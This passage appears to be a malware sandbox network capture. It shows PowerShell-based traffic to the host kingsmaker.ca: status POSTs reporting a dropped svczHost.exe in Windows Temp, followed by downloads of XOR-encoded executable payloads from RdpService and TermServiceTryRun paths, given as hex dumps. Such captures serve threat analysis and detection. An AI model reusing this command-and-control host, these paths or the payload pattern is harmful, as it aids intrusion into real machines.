2024-11-29 08:09:26 UTC	1369	IN	Data Raw: 01 74 00 c2 49 8a d1 e8 87 b5 25 01 49 8c 04 06 4c 90 01 49 8a 01 49 8c 0c 4c c0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b5 25 01 49 8c 04 ee 4d 90 01 49 8a 01 49 8c 0c 34 c0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b5 25 01 49 8c 04 d6 4d 90 01 49 8a 01 49 8c 0c 1c c0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b5 25 01 49 8c 04 be 4d 90 01 49 8a 01 49 8c 0c 04 c0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b5 25 01 49 8c 04 a6 4d 90 01 49 8a 01 49 8c 0c ec c1 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b2 25 01 49 8c 04 8e 4d 90 01 49 8a 01 49 8c 0c d4 c1 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b2 25 01 49 8c 04 76 4d 90 01 49 8a 01 49 8c 0c bc c1 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b2 25 01 49 8c 04 5e 4d 90 01 49 8a 01 49 8c 0c a4 c1 4f 01 49 82 Data Ascii: tI%ILIILOI8tIg%IMII4OI8tIG%IMIIOI8tI'%IMIIOI8tI%IMIIOI8tI%IMIIOI8tI%IvMIIOI8tI%I^MIIOI
2024-11-29 08:09:26 UTC	1369	IN	Data Raw: 0c be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 ae 25 01 49 8c 04 8e 4a 90 01 49 8a 01 49 8c 0c ac be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 ae 25 01 49 8c 04 ee 4a 90 01 49 8a 01 49 8c 0c fc be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 af 25 01 49 8c 04 46 4d 90 01 49 8a 01 49 8c 0c 44 c1 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 af 25 01 49 8c 04 66 4d 90 01 49 8a 01 49 8c 0c 54 c1 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 af 25 01 49 8c 04 9e 4d 90 01 49 8a 01 49 8c 0c 6c c1 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 af 25 01 49 8c 04 ce 4c 90 01 49 8a 01 49 8c 0c 5c c0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 af 25 01 49 8c 04 36 4e 90 01 49 8a 01 49 8c 0c 8c c3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 af 25 01 49 8c 04 66 4e 90 01 49 8a 01 49 8c Data Ascii: OI8tI'%IJIIOI8tI%IJIIOI8tI%IFMIIDOI8tI%IfMIITOI8tI%IMIIlOI8tI%ILII\OI8tIg%I6NIIOI8tIG%IfNII

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:09:36 UTC	284	OUT	POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca Content-Length: 200
2024-11-29 08:09:36 UTC	200	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 63 6f 6d 70 6c 65 74 65 64 3a 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 54 68 65 20 66 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 20 77 61 73 20 70 72 6f 63 65 73 73 65 64 20 61 6e 64 20 73 61 76 65 64 20 61 73 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 73 76 63 7a 48 6f 73 74 2e 65 78 65 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Download completed: C:\\\\Windows\\\\Temp\\\\file\"", "\"The file C:\\\\Windows\\\\Temp\\\\file was processed and saved as C:\\\\Windows\\\\Temp\\\\svczHost.exe\"", "----------"]
2024-11-29 08:09:37 UTC	993	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:09:37 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DbJW%2BFfDU6iWSjSe2D7hj%2F31WR0ZCoLOLw%2Br1FZJwmgc19o81CRRqk4nVLHVBlvyDp2fmr3EvtEnlKZaAmg3%2FZxpGUL497rkdUpGNzrA66nIO1ftlqpEzcXcgXqC17cJjMD%2F%2FgRBxiIB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1264&min_rtt=1133&rtt_var=120&sent=18&recv=22&lost=0&retrans=0&sent_bytes=13899&recv_bytes=9358&delivery_rate=9598246&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea11dd6eccd09f7-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158590&min_rtt=158525&rtt_var=33549&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1144&delivery_rate=24123&cwnd=252&unsent_bytes=0&cid=0fe2f2941086d25a&ts=680&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:09:40 UTC	283	OUT	POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca Content-Length: 64
2024-11-29 08:09:40 UTC	64	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 65 74 20 74 68 75 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"run task\"", "\"ket thuc\"", "----------"]
2024-11-29 08:09:41 UTC	995	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:09:41 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LyaFWCX8PIm53uOPksEWZZGJFQSCkHWhZfBBnSGhciENDi0GrCVtGyyxuvn5uxK1gakexYq736iN7YAALkaPwVYN4yOJTxIjo%2Fm46J57uYt7f56Oz%2FAZmt%2BrpN2l3mrwmfRWDP9PSF74"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1910&min_rtt=1140&rtt_var=186&sent=7167&recv=3482&lost=0&retrans=0&sent_bytes=10223074&recv_bytes=6961&delivery_rate=30598802&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea11deefe000add-LAS server-timing: cfL4;desc="?proto=TCP&rtt=159230&min_rtt=159165&rtt_var=33683&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1007&delivery_rate=24030&cwnd=252&unsent_bytes=0&cid=96a038050eacb153&ts=686&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:10:27 UTC	63	OUT	GET /StaticFile/RdpService/79 HTTP/1.1 Host: kingsmaker.ca
2024-11-29 08:10:27 UTC	1152	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:10:27 GMT Content-Type: application/octet-stream Content-Length: 9429504 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image hash: 10C767E2635167724D6A03475ED8F7A9 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=soXVvszMLymMOIIyif81bVV7JB6l3EHL7OCSMKjnvTOagrr4MBMV4MHCySQIxszbOV9bg7sTqBMvEQDGbBoVmGzDf4w1a16BJ%2BiHvlzULKXKXzrwkRq40vu7TPaeuatfEb2jFNLQi89w"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=53068&min_rtt=1140&rtt_var=5696&sent=7262&recv=3582&lost=0&retrans=0&sent_bytes=10256406&recv_bytes=51402&delivery_rate=30598802&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea11f10df8109f3-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158954&min_rtt=158932&rtt_var=33565&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=701&delivery_rate=24086&cwnd=252&unsent_bytes=0&cid=fd79cc21d9050804&ts=728&x=0"
2024-11-29 08:10:27 UTC	217	IN	Data Raw: 02 15 df 4f 4c 4f 4f 4f 4b 4f 4f 4f b0 b0 4f 4f f7 4f 4f 4f 4f 4f 4f 4f 0f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4e 4f 4f 41 50 f5 41 4f fb 46 82 6e f7 4e 03 82 6e 1b 27 26 3c 6f 3f 3d 20 28 3d 2e 22 6f 2c 2e 21 21 20 3b 6f 2d 2a 6f 3d 3a 21 6f 26 21 6f 0b 00 1c 6f 22 20 2b 2a 61 42 42 45 6b 4f 4f 4f 4f 4f 4f 4f a1 a2 79 6f e5 c3 17 3c e5 c3 17 3c e5 c3 17 3c ec bb 84 3c eb c3 17 3c 95 42 16 3d f2 c3 17 3c e5 c3 16 3c 63 c2 17 3c f5 47 14 3d f6 c3 17 3c f5 47 13 3d dc c3 17 3c ad 46 12 3d e6 c3 17 3c 95 42 13 3d e7 c3 17 3c e5 c3 17 3c e4 c3 17 3c f5 47 12 3d 93 c3 17 3c ad Data Ascii: OLOOOKOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOONOOAPAOFnNn'&<o?= (=."o,.!! ;o-o=:!o&!oo" +aBBEkOOOOOOOyo<<<<<B=<<c<G=<G=<F=<B=<<<G=<
2024-11-29 08:10:27 UTC	1369	IN	Data Raw: 46 17 3d e4 c3 17 3c ad 46 15 3d e4 c3 17 3c 1d 26 2c 27 e5 c3 17 3c 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 1f 0a 4f 4f 2b c9 47 4f 9c 2f 7e 28 4f 4f 4f 4f 4f 4f 4f 4f bf 4f 6d 4f 44 4d 41 66 4f 71 1f 4f 4f db 0e 4f 4f 53 53 4f d7 9e 44 4f 4f 5f 4f 4f 4f 4f 4f 0f 4e 4f 4f 4f 4f 5f 4f 4f 4f 4d 4f 4f 49 4f 4f 4f 4f 4f 4f 4f 49 4f 4f 4f 4f 4f 4f 4f 4f 0f e1 4f 4f 4b 4f 4f 4f 4f 4f 4f 4c 4f 2f ce 4f 4f 5f 4f 4f 4f 4f 4f 4f 5f 4f 4f 4f 4f 4f 4f 4f 4f 5f 4f 4f 4f 4f 4f 4f 5f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 5f 4f 4f 4f 4f 86 ea 4f 47 4d 4f 4f 47 84 ea 4f 33 4e 4f 4f 4f 5f e1 4f fd 4a 4f 4f 4f cf e7 4f b7 c9 4a 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 6f e1 4f 03 5b 4f 4f df e2 d6 4f 53 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f cf e0 d6 4f 67 4f 4f 4f Data Ascii: F=<F=<&,'<OOOOOOOOOOOOOOOOOO+GO/~(OOOOOOOOOmODMAfOqOOOOSSODOO_OOOOONOOOO_OOOMOOIOOOOOOOIOOOOOOOOOOKOOOOOOLO/OO_OOOOOO_OOOOOOOO_OOOOOO_OOOOOOOOOO_OOOOOGMOOGO3NOOO_OJOOOOJOOOOOOOOOOoO[OOOSOOOOOOOOOOOOOOOOOOOOgOOO
2024-11-29 08:10:27 UTC	1369	IN	Data Raw: c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 73 97 67 4f 07 c2 4a e2 c0 17 4f 07 c2 42 d1 c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 50 97 67 4f 07 c2 4a ef c0 17 4f 07 c2 42 de c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 4d 97 67 4f 07 c2 4a b4 c0 17 4f 07 c2 42 a3 c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 aa 98 67 4f 07 c2 4a a1 c0 17 4f 07 c2 42 90 c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 87 98 67 4f 07 c2 4a ae c0 17 4f 07 c2 42 9d c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e4 98 67 4f 07 c2 4a 9b c0 17 4f 07 c2 42 8a c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 c1 98 67 4f 07 c2 4a 88 c0 17 4f 07 c2 42 f7 c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 3e 98 67 4f 07 c2 4a f5 c0 17 4f 07 c2 42 e4 c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 1b 98 67 4f 07 c2 4a e2 c0 Data Ascii: OvO:NsgOJOBOvO:NPgOJOBOvO:NMgOJOBOvO:NgOJOBOvO:NgOJOBOvO:NgOJOBOvO:NgOJOBOvO:N>gOJOBOvO:NgOJ
2024-11-29 08:10:27 UTC	1369	IN	Data Raw: 4f 3a 4e 8c 07 c4 9f a6 a6 9d 67 4f 07 c2 4a 1d dd 17 4f 07 c2 42 0c dd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 83 9d 67 4f 07 c2 4a 02 dd 17 4f 07 c2 42 71 dd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e0 9d 67 4f 07 c2 4a 07 dd 17 4f 07 c2 42 76 dd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 dd 9d 67 4f 07 c2 4a 74 dd 17 4f 07 c2 42 63 dd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 3a 9d 67 4f 07 c2 4a 61 dd 17 4f 07 c2 42 50 dd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 17 9d 67 4f 07 c2 4a 66 dd 17 4f 07 c2 42 55 dd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 74 9d 67 4f 07 c2 4a 6b dd 17 4f 07 c2 42 5a dd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 51 9d 67 4f 07 c2 4a d0 dd 17 4f 07 c2 42 df dd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 4e 9d 67 4f 07 c2 4a d5 dd 17 4f 07 c2 42 c4 Data Ascii: O:NgOJOBOvO:NgOJOBqOvO:NgOJOBvOvO:NgOJtOBcOvO:N:gOJaOBPOvO:NgOJfOBUOvO:NtgOJkOBZOvO:NQgOJOBOvO:NNgOJOB
2024-11-29 08:10:27 UTC	1369	IN	Data Raw: cc 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 25 82 67 4f 07 c2 4a 1c 40 e9 4f 07 c4 4f 07 c2 42 46 cc 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 05 82 67 4f 07 c2 4a 3c 40 e9 4f 07 c4 4f 07 c2 42 4e cc 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 65 82 67 4f 07 c2 4a 14 40 e9 4f 07 c4 4f 07 c2 42 a6 cd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 45 82 67 4f 07 c2 4a 34 40 e9 4f 07 c4 4f 07 c2 42 a6 cd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 a5 83 67 4f 07 c2 4a 2c 40 e9 4f 07 c4 4f 07 c2 42 9e cd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 85 83 67 4f 07 c2 4a 04 40 e9 4f 07 c4 4f 07 c2 42 a6 cd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e5 83 67 4f 07 c2 4a 0c 40 e9 4f 07 c4 4f 07 c2 42 4e cc 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 c5 83 67 4f 07 c2 4a 64 40 e9 4f 07 c4 4f 07 c2 42 Data Ascii: OvO:N%gOJ@OOBFOvO:NgOJ<@OOBNOvO:NegOJ@OOBOvO:NEgOJ4@OOBOvO:NgOJ,@OOBOvO:NgOJ@OOBOvO:NgOJ@OOBNOvO:NgOJd@OOB
2024-11-29 08:10:27 UTC	1369	IN	Data Raw: 07 c4 4f 07 c2 42 6e cd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 45 87 67 4f 07 c2 4a 44 42 e9 4f 07 c4 4f 07 c2 42 46 cd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 a5 88 67 4f 07 c2 4a b4 43 e9 4f 07 c4 4f 07 c2 42 be ce 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 85 88 67 4f 07 c2 4a ac 43 e9 4f 07 c4 4f 07 c2 42 96 ce 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e5 88 67 4f 07 c2 4a 84 43 e9 4f 07 c4 4f 07 c2 42 8e ce 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 c5 88 67 4f 07 c2 4a 9c 43 e9 4f 07 c4 4f 07 c2 42 e6 ce 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 25 88 67 4f 07 c2 4a 84 43 e9 4f 07 c4 4f 07 c2 42 de ce 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 05 88 67 4f 07 c2 4a fc 43 e9 4f 07 c4 4f 07 c2 42 36 ce 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 65 88 67 4f 07 c2 4a ec 43 e9 Data Ascii: OBnOvO:NEgOJDBOOBFOvO:NgOJCOOBOvO:NgOJCOOBOvO:NgOJCOOBOvO:NgOJCOOBOvO:N%gOJCOOBOvO:NgOJCOOB6OvO:NegOJC
2024-11-29 08:10:27 UTC	1369	IN	Data Raw: 07 c2 4a 7c 45 e9 4f 07 c4 4f 07 c2 42 fe 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e5 8d 67 4f 07 c2 4a 54 45 e9 4f 07 c4 4f 07 c2 42 d6 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 c5 8d 67 4f 07 c2 4a 4c 45 e9 4f 07 c4 4f 07 c2 42 c6 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 25 8d 67 4f 07 c2 4a a4 46 e9 4f 07 c4 4f 07 c2 42 36 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 05 8d 67 4f 07 c2 4a 9c 46 e9 4f 07 c4 4f 07 c2 42 de 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 65 8d 67 4f 07 c2 4a f4 46 e9 4f 07 c4 4f 07 c2 42 c6 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 45 8d 67 4f 07 c2 4a ec 46 e9 4f 07 c4 4f 07 c2 42 3e 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 a5 8e 67 4f 07 c2 4a ec 46 e9 4f 07 c4 4f 07 c2 42 16 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 85 8e 67 Data Ascii: J\|EOOB1OvO:NgOJTEOOB1OvO:NgOJLEOOB1OvO:N%gOJFOOB61OvO:NgOJFOOB1OvO:NegOJFOOB1OvO:NEgOJFOOB>1OvO:NgOJFOOB1OvO:Ng
2024-11-29 08:10:27 UTC	1369	IN	Data Raw: c4 9f a6 25 f2 67 4f 07 c2 4a 34 48 e9 4f 07 c4 4f 07 c2 42 76 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 05 f2 67 4f 07 c2 4a 3c 48 e9 4f 07 c4 4f 07 c2 42 6e 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 65 f2 67 4f 07 c2 4a 2c 48 e9 4f 07 c4 4f 07 c2 42 46 31 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 45 f2 67 4f 07 c2 4a 14 48 e9 4f 07 c4 4f 07 c2 42 be 32 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 a5 f3 67 4f 07 c2 4a 0c 48 e9 4f 07 c4 4f 07 c2 42 96 32 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 85 f3 67 4f 07 c2 4a 64 48 e9 4f 07 c4 4f 07 c2 42 8e 32 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e5 f3 67 4f 07 c2 4a 54 48 e9 4f 07 c4 4f 07 c2 42 e6 32 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 c5 f3 67 4f 07 c2 4a 4c 48 e9 4f 07 c4 4f 07 c2 42 de 32 17 4f 07 cc 76 4f 3a 4e 8c Data Ascii: %gOJ4HOOBv1OvO:NgOJ<HOOBn1OvO:NegOJ,HOOBF1OvO:NEgOJHOOB2OvO:NgOJHOOB2OvO:NgOJdHOOB2OvO:NgOJTHOOB2OvO:NgOJLHOOB2OvO:N
2024-11-29 08:10:27 UTC	1369	IN	Data Raw: cc 76 4f 3a 4e 8c 07 c4 9f a6 45 f7 67 4f 07 c2 4a 0c 49 e9 4f 07 c4 4f 07 c2 42 ae 35 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 a5 f8 67 4f 07 c2 4a 0c 49 e9 4f 07 c4 4f 07 c2 42 9e 35 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 85 f8 67 4f 07 c2 4a 64 49 e9 4f 07 c4 4f 07 c2 42 8e 35 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e5 f8 67 4f 07 c2 4a 54 49 e9 4f 07 c4 4f 07 c2 42 e6 35 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 c5 f8 67 4f 07 c2 4a 5c 49 e9 4f 07 c4 4f 07 c2 42 de 35 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 25 f8 67 4f 07 c2 4a 44 49 e9 4f 07 c4 4f 07 c2 42 36 35 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 05 f8 67 4f 07 c2 4a bc 4a e9 4f 07 c4 4f 07 c2 42 2e 35 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 65 f8 67 4f 07 c2 4a 94 4a e9 4f 07 c4 4f 07 c2 42 06 35 17 4f Data Ascii: vO:NEgOJIOOB5OvO:NgOJIOOB5OvO:NgOJdIOOB5OvO:NgOJTIOOB5OvO:NgOJ\IOOB5OvO:N%gOJDIOOB65OvO:NgOJJOOB.5OvO:NegOJJOOB5O
2024-11-29 08:10:27 UTC	1369	IN	Data Raw: c2 42 2e 38 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e5 fd 67 4f 07 c2 4a 5c 4c e9 4f 07 c4 4f 07 c2 42 16 38 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 c5 fd 67 4f 07 c2 4a b4 4d e9 4f 07 c4 4f 07 c2 42 0e 38 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 25 fd 67 4f 07 c2 4a ac 4d e9 4f 07 c4 4f 07 c2 42 66 38 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 05 fd 67 4f 07 c2 4a 84 4d e9 4f 07 c4 4f 07 c2 42 5e 38 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 65 fd 67 4f 07 c2 4a f4 4d e9 4f 07 c4 4f 07 c2 42 b6 39 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 45 fd 67 4f 07 c2 4a ec 4d e9 4f 07 c4 4f 07 c2 42 46 38 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 a5 fe 67 4f 07 c2 4a c4 4d e9 4f 07 c4 4f 07 c2 42 be 39 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 85 fe 67 4f 07 c2 4a ec 4d e9 4f 07 c4 4f Data Ascii: B.8OvO:NgOJ\LOOB8OvO:NgOJMOOB8OvO:N%gOJMOOBf8OvO:NgOJMOOB^8OvO:NegOJMOOB9OvO:NEgOJMOOBF8OvO:NgOJMOOB9OvO:NgOJMOO

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:11:30 UTC	70	OUT	GET /StaticFile/TermServiceTryRun/72 HTTP/1.1 Host: kingsmaker.ca
2024-11-29 08:11:30 UTC	1161	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:11:30 GMT Content-Type: application/octet-stream Content-Length: 2183168 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image hash: BFF2365257251B6BA227A5E748DBD62E CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ILZXZ7KRJflqHKQfM2e5Gri7cEuSKiEQ2UEhW6w4zT%2Fam%2FnW1RQUYCzzBwiMrPJFVdNXF12NVEJlar%2F77jS9Of7xITp21Cb6Seja4yii72dXcpoNjSnSO%2BcH4HfjuYioUgVxvvSGHr5V"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=21717&min_rtt=1130&rtt_var=28794&sent=13911&recv=6880&lost=0&retrans=0&sent_bytes=19701307&recv_bytes=112692&delivery_rate=25002253&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea1209bf8a10add-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158841&min_rtt=158631&rtt_var=33784&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=708&delivery_rate=24047&cwnd=252&unsent_bytes=0&cid=9d9a4b6b18669a61&ts=725&x=0"
2024-11-29 08:11:30 UTC	208	IN	Data Raw: 05 12 18 48 4a 48 48 48 4c 48 47 48 b7 b7 48 48 f0 48 48 48 48 48 48 48 08 48 52 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 49 48 48 f2 58 48 46 57 fc 41 85 69 f0 49 04 85 69 d8 d8 1c 20 21 3b 68 38 3a 27 2f 3a 29 25 68 25 3d 3b 3c 68 2a 2d 68 3a 3d 26 68 3d 26 2c 2d 3a 68 1f 21 26 7b 7a 45 42 6c 7f 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 Data Ascii: HJHHHLHGHHHHHHHHHHHRHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIHHXHFWAiIi !;h8:'/:)%h%=;<h*-h:=&h=&,-:h!&{zEBlHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
2024-11-29 08:11:30 UTC	1369	IN	Data Raw: 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 18 0d 48 48 04 49 43 48 7c 10 a6 2e 48 48 48 48 48 48 48 48 a8 48 4a 49 43 49 4a 51 48 44 46 48 48 08 5b 48 48 48 48 48 34 45 46 48 48 58 48 48 48 78 46 48 48 48 08 48 48 58 48 48 48 4a 48 48 4e 48 48 48 48 48 48 48 4e 48 48 48 48 48 48 48 48 78 6a 48 48 4c 48 48 48 48 48 48 4b 48 08 c9 48 48 58 48 48 08 48 48 48 48 58 48 48 58 48 48 48 48 48 48 58 48 48 48 48 58 47 48 39 48 48 48 48 a8 46 48 4c 59 48 48 48 d8 58 48 48 d4 59 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 08 47 48 44 03 49 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 78 47 48 50 48 48 48 48 48 48 48 48 48 48 Data 